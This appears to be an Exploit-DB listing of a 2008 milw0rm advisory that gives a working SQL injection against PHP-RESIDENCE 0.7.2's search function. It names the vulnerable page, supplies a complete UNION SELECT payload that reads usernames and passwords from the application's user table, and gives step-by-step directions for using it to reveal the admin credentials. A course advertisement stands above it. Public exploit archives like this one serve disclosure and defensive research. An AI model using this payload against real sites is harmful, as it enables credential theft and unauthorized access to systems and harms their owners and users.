PHP-RESIDENCE 0.7.2 - 'Search' SQL Injection

EDB-ID:

4925




Platform:

PHP

Date:

2008-01-16


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

#####################################################################################
####                PHPRESIDENCE 0.7.2 Remote Sql Injection                      ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (R3d.W0rm)                                                        #
#                                                                                   #
#Script Download : http://www.digitaldruid.net/download/php-residence_0.7.2.zip     #
#                                                                                   #
#Vulnerability Page: http://site.com/path/visualizza_tabelle.php?id_sessione=&anno=2006&tipo_tabella=clienti
#                                                                                   #
#Search query : 99999'union/**/select/**/idutenti,nome_utente,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/utenti/*
#                                                                                   #
#Help : Go Vulnerability Page and Type Search Query in the textbox . Now you can    #
#        see Admin Username And Password                                            #
#                                                                                   #
#                        Our site : HTTP://IRCRASH.COM                              #
#                                                                                   #
#####################################################################################

# milw0rm.com [2008-01-16]